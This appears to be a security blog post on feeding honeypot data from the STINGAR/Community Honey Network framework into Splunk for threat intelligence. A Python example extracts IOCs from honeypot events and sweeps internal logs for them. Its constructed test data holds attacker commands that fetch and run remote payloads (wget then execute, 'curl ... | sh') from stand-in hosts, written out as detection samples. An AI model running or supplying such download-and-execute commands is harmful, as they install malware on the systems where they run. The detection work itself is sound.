I’m working on revamping the cyber threat intelligence program at SDSC, adding targeted IOCs, not just additional free feeds. I’ve also been working with STINGAR, a honeypot framework supported by Duke University. STINGAR is based on the open-source Community Honey Network, which takes steps to automate honeypot deployment and management. It’s also a central repo to pull down additional IOCs and contribute your own.
Focusing on IOCs generated by honeypots deployed within SDSC’s name and IP space allows us to quickly realize value from our data. We can take action on, or continue monitoring, the adversaries directly attacking our network. Honeypots are a great tool for learning attacker techniques and patterns, and they provide learning opportunities for malware analysis and attack vector research. Ingesting all of this data is great, but having a way to interact with it is key.
Using a SIEM (in our case Splunk), we’re able to pull additional info out of our logs and act on it. Most IOC lists are generated from the source IPs of botnets scanning the internet. With a honeypot feeding a SIEM, we can pull out richer IOCs: username/password combos, commands executed, post-exploitation URLs, domains and malicious executables (and their hashes). With proper monitoring in place, we can set up alerts looking for outbound communication to any of these IOCs. With authentication and OS command logs, we can look for similar attempts against internal systems, and we can quickly compare file strings and hashes across the entire environment.
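To make the two halves of that workflow concrete, here is an added example (my own illustration, not code from the SDSC program, STINGAR or CHN). It extracts IOCs from honeypot session events and then sweeps constructed proxy, auth and file-hash data for matches. The event lines are constructed and modeled on the JSON layout of the Cowrie SSH honeypot (field names such as `eventid`, `src_ip`, `input`, `url` and `shasum` are an assumption); the internal log formats and hostnames are likewise made up for the example and are not Splunk's own.

```python
"""Extract IOCs from honeypot events, then hunt for them in other logs (added example)."""
import json
import re
from urllib.parse import urlsplit

# Constructed honeypot events, modeled on Cowrie-style JSON (assumption: field names).
FAKE_SHA256 = "0123456789abcdef" * 4  # constructed, not a real sample hash
HONEYPOT_EVENTS = f"""
{{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"a1"}}
{{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1","username":"root","password":"123456"}}
{{"eventid":"cowrie.login.success","src_ip":"198.51.100.23","session":"a1","username":"admin","password":"admin1234"}}
{{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1","input":"cd /tmp; wget http://203.0.113.9/bins/x86 -O x86; chmod +x x86; ./x86"}}
{{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.23","session":"a1","url":"http://203.0.113.9/bins/x86","shasum":"{FAKE_SHA256}"}}
{{"eventid":"cowrie.command.input","src_ip":"192.0.2.77","session":"b2","input":"curl -s http://evil-cdn.example/payload.sh | sh"}}
"""

URL_RE = re.compile(r"https?://[^\s'\"|;&]+")


def _add_url(iocs, url):
    """Record a URL IOC plus the domain/IP it points at, so either form can be matched."""
    iocs["url"].add(url)
    host = urlsplit(url).hostname
    if host:
        iocs["domain"].add(host)


def extract_iocs(event_lines):
    """Build IOC sets (source IPs, credentials, commands, URLs, domains, hashes) from events."""
    iocs = {k: set() for k in ("src_ip", "credential", "command", "url", "domain", "sha256")}
    for line in event_lines.strip().splitlines():
        ev = json.loads(line)
        iocs["src_ip"].add(ev["src_ip"])
        eid = ev["eventid"]
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            iocs["credential"].add((ev["username"], ev["password"]))
        elif eid == "cowrie.command.input":
            iocs["command"].add(ev["input"])
            for url in URL_RE.findall(ev["input"]):  # URLs pulled from attacker commands
                _add_url(iocs, url)
        elif eid == "cowrie.session.file_download":
            _add_url(iocs, ev["url"])
            iocs["sha256"].add(ev["shasum"])
    return iocs


# Constructed internal logs to sweep (format is an assumption: "timestamp host ...").
PROXY_LOG = """
2021-03-01T11:02:10Z ws-14 GET http://203.0.113.9/bins/x86 200
2021-03-01T11:05:33Z ws-22 GET https://www.example.org/ 200
"""
AUTH_LOG = """
2021-03-01T11:10:01Z db-01 sshd accepted password for admin from 10.0.0.5
2021-03-01T11:10:05Z db-01 sshd failed password for root from 10.0.0.5
"""
AUTH_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd (?P<result>accepted|failed) password for (?P<user>\S+) from (?P<src>\S+)$")
# Constructed host -> {path: sha256} inventory, as an EDR or file-integrity tool might report.
FILE_HASHES = {"ws-14": {"/tmp/x86": FAKE_SHA256}, "ws-22": {"/usr/bin/ls": "ff" * 32}}


def sweep(iocs, proxy_log, auth_log, file_hashes):
    """Return (alert_type, host, detail) tuples for every IOC hit across the three sources."""
    hits = []
    for line in proxy_log.strip().splitlines():
        _ts, host, _method, url, _status = line.split()
        if url in iocs["url"] or urlsplit(url).hostname in iocs["domain"]:
            hits.append(("outbound_to_ioc", host, url))
    attacker_users = {user for user, _pw in iocs["credential"]}
    for line in auth_log.strip().splitlines():
        m = AUTH_RE.match(line)
        if m and m.group("user") in attacker_users:  # low fidelity on its own; see note below
            hits.append(("honeypot_username_reuse", m.group("host"), f"{m.group('result')}:{m.group('user')}"))
    for host, files in file_hashes.items():
        for path, digest in files.items():
            if digest in iocs["sha256"]:
                hits.append(("known_bad_hash", host, path))
    return hits


if __name__ == "__main__":
    found = extract_iocs(HONEYPOT_EVENTS)
    for kind, values in found.items():
        print(kind, sorted(map(str, values)))
    for alert in sweep(found, PROXY_LOG, AUTH_LOG, FILE_HASHES):
        print("ALERT", *alert)
```

The URL and hash matches are high-confidence alerts; an internal host fetching a binary that a honeypot session downloaded is worth paging on. The credential match is deliberately weaker: internal auth logs rarely carry the password, so all you can match is the username, and names like `root` or `admin` will hit constantly. Treat username-only matches as a hunting lead to join against source IP and timing rather than an alert, or restrict the check to the more unusual usernames the honeypot sees.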
As more sessions and data are generated, it becomes easier to pick out anomalies and determine human vs. botnet interactions. These behaviors are crucial in determining the effectiveness of our honeypot. Levels of customization vary per honeypot, but to attract human interaction, it’s important to disguise your decoy as something familiar and enticing.
I’ll post more about my honeynet and Splunk setup as time goes on. I’ll include programs, tools, configurations and a video tutorial. Thanks for reading, and until next time!